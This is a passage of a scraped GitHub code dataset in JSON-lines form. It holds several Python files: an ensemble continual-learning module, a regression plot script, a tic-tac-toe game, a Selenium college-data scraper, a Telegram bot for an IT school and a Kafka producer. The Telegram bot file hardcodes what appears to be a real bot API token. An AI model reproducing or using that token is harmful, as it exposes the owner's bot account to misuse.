Optional[List[int]] = None,\n device: torch.device = 'cpu',\n ):\n \"\"\"Adaptation of https://arxiv.org/pdf/2105.13327.pdf for end-to-end continual learning.\n :param keys: memory size x key size\n \"\"\"\n super().__init__()\n self.encoder = encoder\n self.input_size = input_size\n self.num_classes = num_classes\n self.num_classifiers = num_classifiers\n self.k_neighbors = k_neighbors\n self.device = device\n self.keys = self._init_keys(trainable=trainable_keys)\n self.classes = classes\n self.learning_rate = learning_rate\n self.weight_decay = weight_decay\n self.tanh_factor = tanh_factor\n self.hard_voting = hard_voting\n\n assert len(self.keys) == self.num_classifiers\n\n self.knn_num_samples = 128 # TODO unused\n self.knn_use_manual_grad = True\n self.knn_epsilon = 5e-4\n self.knn_inner_iter = 400\n self.dknn = DKNN(\n k=k_neighbors,\n num_samples=self.knn_num_samples,\n num_neighbors=self.num_classifiers,\n use_manual_grad=self.knn_use_manual_grad,\n epsilon=self.knn_epsilon,\n max_iter=self.knn_inner_iter,\n device=self.device,\n )\n\n self.distribution_tracker = GaussianNB()\n\n self.models = ModuleList([WeakLearner(input_size=self.input_size, output_size=self.num_classes, tanh_factor=self.tanh_factor, device=self.device) for _ in range(self.num_classifiers)])\n self.vanilla_classifier = VanillaClassifier(\n input_size=self.input_size, output_size=self.num_classes, device=self.device\n ).to(self.device)\n self.tanh_classifier = TanhClassifier(\n input_size=self.input_size, output_size=self.num_classes, tanh_factor=self.tanh_factor, device=self.device\n ).to(self.device)\n self.keys_optimizer = torch.optim.Adam(\n params=[{'params': self.keys}], lr=0.00005,\n )\n self.models_stats = defaultdict(lambda: defaultdict(int))\n self.seen_classes = set()\n self.train_dataset = None\n self.train_loader = None\n\n def _init_keys(self, trainable: bool = False):\n keys = np.random.normal(size=(self.num_classifiers, self.input_size))\n keys = torch.from_numpy(keys).to(self.device)\n keys = keys.type(torch.FloatTensor)\n return nn.Parameter(nn.functional.normalize(keys, p=2, dim=1, eps=1e-12), requires_grad=trainable)\n\n def lookup_memory(self, input: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n input = torch.nn.functional.normalize(input, p=2, dim=1, eps=1e-12).to(self.device)\n knn_similarity, cos_similarity, cos_distance = self.dknn(\n query=input, neighbors=self.keys, cosine_distance=True, return_distances=True\n )\n return knn_similarity, cos_similarity, cos_distance\n\n def encode(self, example: Tensor) -> Tensor:\n return self.encoder.get_features(example)\n\n def ensemble_forward(self, x: torch.Tensor, knn_similarity: torch.Tensor, cos_similarity: torch.Tensor) -> torch.Tensor:\n ensemble_outputs_batch = []\n for single_input, single_knn_sim, single_cos_sim in zip(x, knn_similarity, cos_similarity):\n ensemble_outputs = [model.forward(single_input.view(1, -1)) for index, model in enumerate(self.models)]\n ensemble_outputs_stacked = torch.cat(ensemble_outputs, dim=0).unsqueeze(0)\n ensemble_outputs_batch.append(ensemble_outputs_stacked)\n ensemble_outputs_batch = torch.cat(ensemble_outputs_batch, dim=0).to(self.device)\n cosine_similarities = torch.tensor(data=cos_similarity).unsqueeze(dim=2).to(self.device)\n knn_similarities = knn_similarity.unsqueeze(dim=2).to(self.device)\n ensemble_outputs_batch = ensemble_outputs_batch * knn_similarities\n cosine_similarities = cosine_similarities * knn_similarities\n ensemble_outputs = torch.sum(ensemble_outputs_batch * cosine_similarities, dim=1) / torch.sum(cosine_similarities, dim=1)\n return ensemble_outputs\n\n def forward(self, x: Tensor, x_is_encoded: bool = False):\n if not x_is_encoded:\n x = self.encode(x)\n x = x.to(self.device)\n # self.distribution_tracker.partial_fit(x.detach().numpy(), y.detach().numpy(), classes=self.classes)\n\n # self.keys_optimizer.zero_grad()\n\n knn_similarity, cos_similarity, cos_distance = self.lookup_memory(x)\n\n # self.update_model_stats(indexes, y.tolist())\n\n vanilla_output = self.vanilla_classifier.forward(x)\n tanh_output = self.tanh_classifier.forward(x)\n ensemble_outputs = self.ensemble_forward(x, knn_similarity, cos_similarity)\n\n # self.keys_optimizer.step() # TODO\n\n # for new_label in torch.unique(y):\n # self.update_seen_classes(new_label.item())\n\n return ensemble_outputs, tanh_output, vanilla_output, cos_distance, knn_similarity\n\n def predict(self, x: Tensor, return_dict: bool = False) -> Union[Tensor, Dict[str, Tensor]]:\n x = self.encode(x) # TODO is_encoded\n x = x.to(self.device)\n knn_similarity, cos_similarity, cos_distance = self.lookup_memory(x)\n\n with torch.no_grad():\n vanilla_outputs = self.vanilla_classifier.forward(x)\n tanh_outputs = self.tanh_classifier.forward(x)\n ensemble_outputs = self.ensemble_forward(x, knn_similarity, cos_similarity)\n\n y_pred_vanilla = torch.argmax(vanilla_outputs, dim=1)\n y_pred_tanh = torch.argmax(tanh_outputs, dim=1)\n y_pred_ensemble = torch.argmax(ensemble_outputs, dim=1)\n\n if return_dict:\n return {\n 'vanilla': y_pred_vanilla,\n 'tanh': y_pred_tanh,\n 'ensemble': y_pred_ensemble,\n }\n\n return y_pred_ensemble\n\n def is_known_class(self, label: Any) -> bool:\n return label in self.seen_classes\n\n def update_seen_classes(self, label: Any) -> None:\n self.seen_classes.add(label)\n\n def update_model_stats(self, indexes: np.ndarray, labels: Any) -> None:\n for index_group, label in zip(indexes, labels):\n for index in index_group:\n self.models_stats[index][label] += 1\n\n\ndef generate_example_from_nb(model, class_to_sample: int, examples_count: int = 1):\n class_mean = model.theta_[class_to_sample]\n class_std = np.sqrt(model.var_[class_to_sample])\n sampled = np.random.normal(loc=class_mean, scale=class_std,\n size=(examples_count, len(class_mean))).reshape(examples_count, -1)\n\n sampled = np.clip(sampled, -1, 1)\n return sampled\n\n\ndef generate_batch(nb_model, classes_to_sample, shuffle: bool = True) -> torch.tensor:\n generated_examples = []\n generated_labels = []\n for class_index, examples_count in classes_to_sample.items():\n generated_example = generate_example_from_nb(nb_model, class_index, examples_count)\n generated_tensor = torch.from_numpy(generated_example)\n generated_examples.append(generated_tensor)\n generated_labels.extend([class_index] * examples_count)\n\n batch = torch.cat(generated_examples, dim=0).float()\n labels = torch.tensor(generated_labels)\n\n if shuffle:\n indexes_shuffled = torch.randperm(len(labels))\n batch = batch[indexes_shuffled].view(batch.size())\n labels = labels[indexes_shuffled]\n\n return batch, labels\n","repo_name":"mateusz-wojcik-97/neural-architecture-for-online-ensemble-cl","sub_path":"continual_learning/models/continual/ensemble/ensemble_e2e_module_avalanche.py","file_name":"ensemble_e2e_module_avalanche.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"73407634205","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport regression\nfrom numpy import *\nimport matplotlib.pyplot as plt\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n xArr, yArr = regression.loadDataSet('ex0.txt')\n # print(regression.lwlr(xArr[0],xArr,yArr,1.0))\n # print(regression.lwlr(xArr[0], xArr, yArr, 0.001))\n # 得到数据集所有点的估计\n yHat = regression.lwlrTest(xArr, xArr, yArr, 0.003)\n xMat = mat(xArr)\n srdInd = xMat[:, 1].argsort(0)\n xSort = xMat[srdInd][:, 0, :]\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(xSort[:, 1], yHat[srdInd])\n plt.show()\n","repo_name":"chintsan-code/machine-learning-tutorials","sub_path":"regression_lwlr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33912079153","text":"employees=[\n [10,\"christy\",\"dataanalyst\",50000],\n [11,\"jhon\",\"ba\",30000],\n [12,\"sab\",\"dataanalyst\",40000],\n [13,\"tom\",\"developer\",40000],\n [14,\"jhoni\",\"developer\",30000],\n [15,\"sabir\",\"dataanalyst\",50000],\n [16,\"tino\",\"developer\",40000],\n [17,\"tomis\",\"developer\",47000],\n [18,\"jhonis\",\"developer\",32000],\n\n]\n#print number of employees in this company\nnumber_of_employees=len(employees)\nprint(\"number of employees\",number_of_employees)\n#print total amount of salary\ntotal=0\nfor emp in employees:\n total+=emp[3]\nprint(\"total amount\",total)\n#group by designation\nd_cnt,da_cnt,ba_cnt=0,0,0\nfor emp in employees:\n if emp[2]==\"dataanalyst\":\n da_cnt+=1\n elif emp[2]==\"developer\":\n d_cnt+=1\n else:\n ba_cnt+=1\nprint(\"developer =\",d_cnt)\nprint(\"dataanalyst =\",da_cnt)\nprint(\"ba =\",ba_cnt)\n#print highest salaryed employee\nsalary_list=[]\nfor emp in employees:\n salary_list.append(emp[3])\nprint(salary_list)\nhig_salary=max(salary_list)\nprint(hig_salary)\nfor emp in employees:\n if emp[3]==hig_salary:\n print(emp)\n#print lowest salary man as developer\nd_salary_list=[]\nfor emp in employees:\n if(emp[2]==\"developer\"):\n d_salary_list.append(emp[3])\nlow_salary=min(d_salary_list)\nfor emp in employees:\n if (emp[3]==low_salary):\n print(emp)","repo_name":"sreeragkm77/pythondjangoluminar","sub_path":"pythoncollections/listprograms/employees_nested.py","file_name":"employees_nested.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7264317769","text":"from random import randint\nimport curses\nfrom enum import Enum\n\nfrom src import ProgramState, Board\n\nfrom src.scoreboard_managment import update_scoreboard\n\nclass GameState(Enum):\n # stany gry\n MOVE = 1 # gracz wykonuje ruch\n CONFIRM = 2 # gracz potwierdza lub cofa ruch\n END = 3 # gra zakończona\n\n\nclass GameResult(Enum):\n # wyniki gry\n WIN = 1 # wygrana\n TIE = 2 # remis\n\n\nclass Game(ProgramState):\n def __init__(self, board_size, starting_player, player1, player2):\n self.board_size = board_size\n self.starting_player = starting_player\n self.players = [player1, player2]\n self.symbols = [\" \", player1.symbol, player2.symbol]\n self.undoes = [player1.undoes, player2.undoes]\n\n self.level = 0\n\n # Jeżeli gracz, który ma wykonać pierwszy ruch nie został podany to jest wybierany losowo\n self.current_player = (self.starting_player if self.starting_player > 0 else randint(0, 1))\n\n self.tui_color = self.players[self.current_player].color\n\n self.board = Board(self.board_size)\n\n self.game_state = GameState.MOVE\n self.game_result = GameResult.WIN\n\n self.board_selection = [0, 0] # wybór pola na planszy\n self.selection = 0 # wybór pozycji w menu\n\n def player(self):\n # zwraca gracza do którego należy tura\n return self.players[self.current_player]\n\n def adv_player(self):\n # zamienia gracza do którego należy tura\n self.current_player = (self.current_player + 1) % 2\n self.tui_color = self.players[self.current_player].color\n\n def loop(self, scr):\n self.draw(scr)\n\n while True:\n c = scr.getch()\n if c == ord(\"q\"):\n return \"menu\", [], {}\n elif c in (ord(\" \"), ord(\"\\n\")):\n if self.game_state == GameState.END:\n return \"menu\", [], {}\n\n elif self.game_state == GameState.CONFIRM:\n if self.selection == 0:\n self.game_state = GameState.MOVE\n\n winner = self.board.win_check()\n new_position = self.board.get_random_free()\n\n if winner:\n self.game_result = GameResult.WIN\n self.game_state = GameState.END\n self.tui_color = self.players[winner - 1].color\n\n update_scoreboard(self.player().name, 'win_pvp')\n elif not new_position:\n self.game_result = GameResult.TIE\n self.game_state = GameState.END\n self.tui_color = 1\n else:\n self.board_selection = new_position\n self.adv_player()\n\n elif self.selection == 1:\n if self.undoes[self.current_player] != 0:\n self.board.remove(self.board_selection[0], self.board_selection[1])\n self.undoes[self.current_player] = self.undoes[self.current_player] - 1\n self.game_state = GameState.MOVE\n \n elif self.game_state == GameState.MOVE:\n if self.board.place(self.board_selection[0], self.board_selection[1], self.current_player + 1):\n self.game_state = GameState.CONFIRM\n\n self.draw(scr)\n elif c in (curses.KEY_DOWN, ord(\"s\"), ord(\"j\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[1] = (self.board_selection[1] + 1) % self.board_size\n self.draw(scr)\n elif c in (curses.KEY_UP, ord(\"w\"), ord(\"k\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[1] = (self.board_selection[1] - 1) % self.board_size\n self.draw(scr)\n elif c in (curses.KEY_LEFT, ord(\"a\"), ord(\"h\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[0] = (self.board_selection[0] - 1) % self.board_size\n elif self.game_state == GameState.CONFIRM:\n self.selection = (self.selection - 1) % 2\n self.draw(scr)\n elif c in (curses.KEY_RIGHT, ord(\"d\"), ord(\"l\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[0] = (self.board_selection[0] + 1) % self.board_size\n elif self.game_state == GameState.CONFIRM:\n self.selection = (self.selection + 1) % 2\n self.draw(scr)\n\n def draw(self, scr):\n scr.clear()\n\n self.draw_header(scr, \"Standard Game\", 2, 1)\n self.draw_player_names(scr, 21, 1)\n self.draw_confirm_buttons(scr, 2, 6)\n self.draw_end_message(scr, 2, 6)\n self.draw_board(scr, 2, 9)\n\n self.tui_template(scr)\n\n scr.refresh()\n\n def draw_confirm_buttons(self, scr, x, y):\n if self.game_state == GameState.CONFIRM:\n scr.addstr(y, x, \" confirm \", curses.color_pair(self.tui_color) | curses.A_BLINK if self.selection == 0 else curses.color_pair(1))\n if self.undoes[self.current_player] == 0:\n scr.addstr(y, x+13, \" undo \", curses.color_pair(self.tui_color) | curses.A_BLINK if self.selection == 1 else curses.color_pair(1))\n scr.addstr(\" - you can't undo\")\n else:\n scr.addstr(y, x+13, \" undo \", curses.color_pair(self.tui_color) | curses.A_BLINK if self.selection == 1 else curses.color_pair(1))\n scr.addstr(f\" - you have {self.undoes[self.current_player]} undoes\")\n\n def draw_end_message(self, scr, x, y):\n if self.game_state == GameState.END:\n message = (\" TIE \" if self.game_result == GameResult.TIE else f\" {self.player().get_name()} WON \")\n\n scr.addstr(y, x, message, curses.color_pair(self.tui_color))\n scr.addstr(y, x + 2 + len(message), \" exit \", curses.color_pair(self.tui_color) | curses.A_BLINK)\n\n def draw_header(self, scr, header, x, y):\n scr.addstr(y, x, \" \"*(len(header)+4), curses.color_pair(self.tui_color))\n scr.addstr(y+1, x, f\" {header} \", curses.color_pair(self.tui_color))\n scr.addstr(y+2, x, \" \"*(len(header)+4), curses.color_pair(self.tui_color))\n\n def draw_player_names(self, scr, x, y):\n scr.addstr(y, x, self.players[0].get_name(), curses.color_pair(0 if self.current_player else self.tui_color))\n scr.addstr(y+2, x, self.players[1].get_name(), curses.color_pair(0 if not self.current_player else self.tui_color))\n\n def draw_board(self, scr, x_pos, y_pos):\n for y in range(self.board_size):\n for x in range(self.board_size):\n color = curses.color_pair(1)\n if (y == self.board_selection[1] and x == self.board_selection[0] and self.game_state == GameState.MOVE):\n color = curses.color_pair(self.tui_color) | curses.A_BLINK\n elif (y == self.board_selection[1] and x == self.board_selection[0] and self.game_state == GameState.CONFIRM):\n color = curses.color_pair(self.tui_color)\n\n scr.addstr(y_pos + y * 4, x_pos + x * 9, \" \", color)\n scr.addstr(y_pos + y * 4 + 1, x_pos + x * 9, f\" {self.symbols[self.board(x,y)]} \", color,)\n scr.addstr(y_pos + y * 4 + 2, x_pos + x * 9, \" \", color)\n","repo_name":"mpiek-agh/tictactoe_npg","sub_path":"src/program_states/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74809949723","text":"import requests\r\nimport csv\r\nfrom selenium import webdriver\r\nimport time\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom bs4 import BeautifulSoup\r\n\r\nURL = \"https://nces.ed.gov/collegenavigator/\"\r\npage = requests.get(URL)\r\n\r\noptions = Options()\r\noptions.add_argument(\"--window-size=1920,1200\")\r\n\r\ndriver_path = \"\\\\Users\\\\patri\\\\Downloads\\\\chromedriver_win32 (1)\\\\chromedriver\"\r\ndriver = webdriver.Chrome(options=options, executable_path=driver_path)\r\n\r\nsoup = BeautifulSoup(page.content, \"html.parser\")\r\nresults = soup.find(id=\"default\")\r\n\r\ncolleges_list = [\"Stanford\", \"Harvard\", \"University of Texas at Austin\", \"Rice University\",\r\n \"Howard University\", \"Texas State University\", \"Rensselaer Polytechnic Institute\",\r\n \"University of California-Berkeley\", \"University of California-Los Angeles\",\r\n \"Dartmouth College\", \"Cornell University\", \"Columbia University in the City of New York\",\r\n \"Neumont\", \"Purdue University-Main Campus\", \"Massachusetts Institute of Technology\",\r\n \"Duke University\", \"University of Pennsylvania\", \"University of Southern California\",\r\n \"Vanderbilt University\", \"Worcester Polytechnic Institute\", \"University of California-Irvine\",\r\n \"Northwestern University\", \"California Polytechnic State University\", \"University of California-Santa Cruz\",\r\n \"University of California-Davis\", \"University of Massachusetts Amherst\", \"Harvey Mudd College\",\r\n \"University of Rochester\", \"University of Pittsburgh-Pittsburgh Campus\", \"University of Hawaii at Manoa\",\r\n \"Hawaii Pacific University\", \"California State University Northridge\", \"California State University Long Beach\",\r\n \"University of North Texas\", \"University of Texas at San Antonio\", \"Brown University\", \r\n \"University of Colorado Boulder\", \"Colorado School of Mines\", \"University of Washington-Seattle\",\r\n \"Washington University in St. Louis\", \"Rochester Institute of Technology\", \"Carnegie Mellon\"]\r\n\r\nfor_csv = []\r\n\r\nfor college in colleges_list:\r\n \r\n our_price, acceptance_rate, RnW25, RnW75, M25, M75 = \"\", \"\", \"\", \"\", \"\", \"\"\r\n \r\n driver.get(URL)\r\n search_bar = driver.find_element_by_id(\"ctl00_cphCollegeNavBody_ucSearchMain_txtName\")\r\n search_bar.send_keys(f\"{college}\\n\")\r\n time.sleep(1)\r\n \r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr/td[2]').text\r\n if (college == \"Howard University\" or college == \"Texas State University\" or college == \"University of Rochester\"):\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[2]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[2]/td[2]').text\r\n elif (college == \"University of Pennsylvania\"):\r\n next_page = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_divPagingControls\"]/div/a')\r\n next_page.click()\r\n time.sleep(1)\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[1]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[1]/td[2]').text\r\n elif (college == \"Northwestern University\"):\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]').text\r\n elif (college == \"University of Southern California\"):\r\n school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[3]/td[2]/a')\r\n school_name_str = school_name.text\r\n loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[3]/td[2]').text \r\n## elif (college == \"Columbia University\"):\r\n## school_name = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]/a')\r\n## school_name_str = school_name.text\r\n## loc = driver.find_element_by_xpath('//*[@id=\"ctl00_cphCollegeNavBody_ucResultsMain_tblResults\"]/tbody/tr[5]/td[2]').text \r\n school_name.click()\r\n time.sleep(1)\r\n \r\n school_website = driver.find_element_by_xpath('//*[@id=\"RightContent\"]/div[4]/div/div[2]/table/tbody/tr[2]/td[2]/a').text\r\n school_type = driver.find_element_by_xpath('//*[@id=\"RightContent\"]/div[4]/div/div[2]/table/tbody/tr[3]/td[2]').text\r\n city_size = driver.find_element_by_xpath('//*[@id=\"RightContent\"]/div[4]/div/div[2]/table/tbody/tr[5]/td[2]').text\r\n \r\n price = driver.find_element_by_xpath('//*[@id=\"netprc\"]/div[1]')\r\n price.click()\r\n time.sleep(1)\r\n try:\r\n our_price = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl02\"]/div/table[2]/tbody/tr[5]/td[4]').text\r\n except:\r\n pass\r\n admissions = driver.find_element_by_xpath('//*[@id=\"admsns\"]/div[1]')\r\n admissions.click()\r\n time.sleep(1)\r\n try:\r\n acceptance_rate = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[2]/tbody/tr[2]/td[2]').text\r\n except:\r\n pass\r\n try:\r\n RnW25 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[1]/td[2]').text\r\n RnW75 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[1]/td[3]').text\r\n M25 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[2]/td[2]').text\r\n M75 = driver.find_element_by_xpath('//*[@id=\"divctl00_cphCollegeNavBody_ucInstitutionMain_ctl04\"]/div/table[5]/tbody/tr[2]/td[3]').text\r\n except:\r\n pass\r\n\r\n chance = \"\"\r\n try:\r\n if (int(RnW25) > 720 or int(M25) > 710):\r\n chance = \"Reach\"\r\n rate = acceptance_rate[:-1]\r\n if(int(rate)<16):\r\n chance = \"Wildcard\"\r\n elif (int(RnW75) < 720 and int(M75) < 710):\r\n chance = \"Safety\"\r\n else:\r\n chance = \"Target\"\r\n except:\r\n pass\r\n\r\n loc_list = loc.splitlines()\r\n location = loc_list[1]\r\n \r\n college_dict = {\"name\": school_name_str, \"chance\": chance, \"website\": school_website, \"type\": school_type,\r\n \"location\": location, \"city size\": city_size, \"acceptance rate\": acceptance_rate, \"price\": our_price,\r\n \"separator\": \"-\", \"reading25\": RnW25, \"reading75\": RnW75, \"math25\": M25, \"math75\": M75}\r\n for_csv.append(college_dict)\r\n \r\n print(f\"{school_name_str}: {chance}\")\r\n print(f\"{school_website}\")\r\n print(f\"{school_type}\")\r\n print(f\"Location: {location}\")\r\n print(f\"{city_size}\")\r\n print(f\"Acceptance Rate: {acceptance_rate}\")\r\n print(f\"Expected Net Price: {our_price}\")\r\n print(f\"Reading and Writing: {RnW25}-{RnW75}\")\r\n print(f\"Math: {M25}-{M75}\")\r\n print(\"\")\r\n \r\ndriver.quit()\r\n\r\nwith open('colleges_file.csv',mode=\"w\") as colleges_file:\r\n colleges_writer = csv.writer(colleges_file, delimiter=\",\", quotechar='\"', lineterminator=\"\\n\", quoting=csv.QUOTE_MINIMAL)\r\n for c in for_csv:\r\n colleges_writer.writerow([c[\"name\"],c[\"chance\"],c[\"website\"],\r\n c[\"type\"],c[\"location\"],c[\"city size\"],c[\"acceptance rate\"],\r\n c[\"price\"],c[\"reading25\"],c[\"separator\"],c[\"reading75\"],\r\n c[\"math25\"],c[\"separator\"],c[\"math75\"]])\r\n\r\n\r\n\r\n\r\n","repo_name":"cierraw01/college-info-scraper","sub_path":"college_scrape.py","file_name":"college_scrape.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"11684576879","text":"import telebot\r\nimport openpyxl\r\na = False\r\ntext_about_us = \"Generation Z (GenZer) - it-кластер для дітей та підлітків нового покоління. Наші викладачі допоможуть Вашій дитині перетворити свої здібності та захоплення у професію мрії. Саме тут Ваша дитина зможе просто і захоплююче освоювати нові напрямки в комп'ютерній сфері, дізнатися масу корисної інформації і знайти нових друзів-однодумців з якими вивчення пройде неймовірно весело і цікаво! Сучасна методика викладання, новітнє технологічне та програмне забезпечення, висококваліфіковані наставники та заняття, які будуються на практиці - саме те, що потрібно для успішного старту в ІТ. Ми гордимося тим, що 85% наших студентів приходять до нас за рекомендаціями від знайомих та із задоволенням відвідують заняття!\"\r\nkeyboard_menu = telebot.types.ReplyKeyboardMarkup()\r\nkeyboard_menu.row(\"Новини\",\"Розклад\")\r\nkeyboard_menu.row(\"Викладачі\",\"Про Нас\")\r\nkeyboard_teach = telebot.types.ReplyKeyboardMarkup()\r\nkeyboard_teach.row(\"Тетяна Климчук\",\"Олександр Музиченко\")\r\nkeyboard_teach.row(\"Юрій Панченко\",\"Євген Солоп\")\r\nkeyboard_teach.row(\"Олександр Паршуков\",\"Альона Повисок\")\r\nkeyboard_teach.row(\"Микола Павленко\")\r\nkeyboard_teach.row(\"<--- Назад\")\r\nbot = telebot.TeleBot('915489974:AAGL39ZFY0YMiGhBelUyApqiET7d7O1z8eU')\r\n@bot.message_handler(commands = ['start'])\r\ndef snoopie(message):\r\n bot.send_message(message.from_user.id,\"добрий день,виберіть кнопку\",reply_markup = keyboard_menu)\r\n@bot.message_handler(content_types = ['text'])\r\ndef yssup(message):\r\n global a\r\n if message.text == \"Новини\":\r\n bot.send_message(message.from_user.id,\"Ви натиснули кнопку Новини\",reply_markup = keyboard_menu)\r\n if message.text == \"Розклад\":\r\n wb = openpyxl.load_workbook(filename = 'people.xlsx')\r\n List = wb['sheet1']\r\n coloumn_a = List['A']\r\n for i in range(2,len(coloumn_a)+1):\r\n if List['A'+str(i)].value == message.from_user.id:\r\n if List['D'+str(i)].value != 0:\r\n print(str(List['D'+str(i)].value))\r\n bot.send_message(message.from_user.id,str(List['D'+str(i)].value))\r\n if List['E'+str(i)].value != 0:\r\n bot.send_message(message.from_user.id,str(List['E'+str(i)].value))\r\n if List['F'+str(i)].value != 0:\r\n bot.send_message(message.from_user.id,str(List['F'+str(i)].value))\r\n if message.text == \"Викладачі\":\r\n bot.send_sticker(message.from_user.id, \"CAACAgIAAxkBAAJhg161Xl_9xN3NWshGdxqG5WvFA1MpAAIsAAN94rIVYHIAATpgviAGGQQ\")\r\n msg = bot.send_message(message.from_user.id,\"Ви натиснули кнопку Викладачі\",reply_markup = keyboard_teach)\r\n bot.register_next_step_handler(msg , teacher)\r\n a = True\r\n if a:\r\n msg = bot.send_message(message.from_user.id,\"\",reply_markup = keyboard_teach)\r\n bot.register_next_step_handler(msg , teacher)\r\n if message.text == \"Про Нас\":\r\n bot.send_photo(message.from_user.id,open('foto.png','rb'))\r\n bot.send_message(message.from_user.id,text_about_us)\r\ndef teacher(message):\r\n global a\r\n if message.text == \"<--- Назад\":\r\n msg = bot.send_message(message.from_user.id,\"В повернулись до меню\",reply_markup = keyboard_menu)\r\n bot.register_next_step_handler(msg, yssup)\r\n a = False\r\n if message.text == \"Тетяна Климчук\":\r\n bot.send_message(message.from_user.id,\"Т.К.\")\r\n if message.text == \"Олександр Музиченко\":\r\n bot.send_message(message.from_user.id,\"O.M.\")\r\n if message.text == \"Юрій Панченко\":\r\n bot.send_message(message.from_user.id,\"Ю.П.\")\r\n if message.text == \"Євген Солоп\":\r\n bot.send_message(message.from_user.id,\"Є.С.\")\r\n if message.text == \"Олександр Паршуков\":\r\n bot.send_message(message.from_user.id,\"О.П.\")\r\n if message.text == \"Альона Повисок\":\r\n bot.send_message(message.from_user.id,\"A.П.\")\r\n if message.text == \"Микола Павленко\":\r\n bot.send_message(message.from_user.id,\"М.П.\")\r\nbot.polling()\r\n","repo_name":"StudentGenZer/python_bot","sub_path":"genzer_text_bot_cabinet.py","file_name":"genzer_text_bot_cabinet.py","file_ext":"py","file_size_in_byte":4963,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13503111023","text":"import json\n\nfrom aiokafka import AIOKafkaConsumer, AIOKafkaProducer\nfrom aiokafka.structs import RecordMetadata\n\n\nclass KafkaProducerHandler:\n def __init__(self, topic_name, bootstrap_servers, event_loop, logger):\n self.topic_name = topic_name\n self.bootstrap_servers = bootstrap_servers\n self.event_loop = event_loop\n self.logger = logger\n\n self.producer = AIOKafkaProducer(loop=event_loop, bootstrap_servers=bootstrap_servers)\n\n async def send_message(self, payload):\n try:\n self.logger.info(f\"sending buy request to kafka {self.bootstrap_servers} - {self.topic_name}. request payload: {payload}\")\n producer_response = await self.producer.send_and_wait(self.topic_name, payload)\n\n if not isinstance(producer_response, RecordMetadata):\n raise Exception(f\"Kafka Producer send_and_wait response is type {type(producer_response)} and not RecordMetadata as expected.\")\n except Exception as e:\n raise Exception(f\"Error was thrown while sending buy request to kafka. Exception: {e.args}\")\n","repo_name":"tom1187/IS-home-assignment","sub_path":"customer_facing_api/kafka_producer_handler.py","file_name":"kafka_producer_handler.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6311753739","text":"#! /usr/bin/env python\n\nfrom gamelib import main\nimport sys\n\nsound = True\nfps = False\n\nif '--nosound' in sys.argv:\n sound = False\n\nif '--fps' in sys.argv:\n fps = True\n\nmain.main(sound, fps)\n\n","repo_name":"pdevine/suburbia","sub_path":"run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"20207196216","text":"from parametres_configurationP import *\r\n\r\ndef 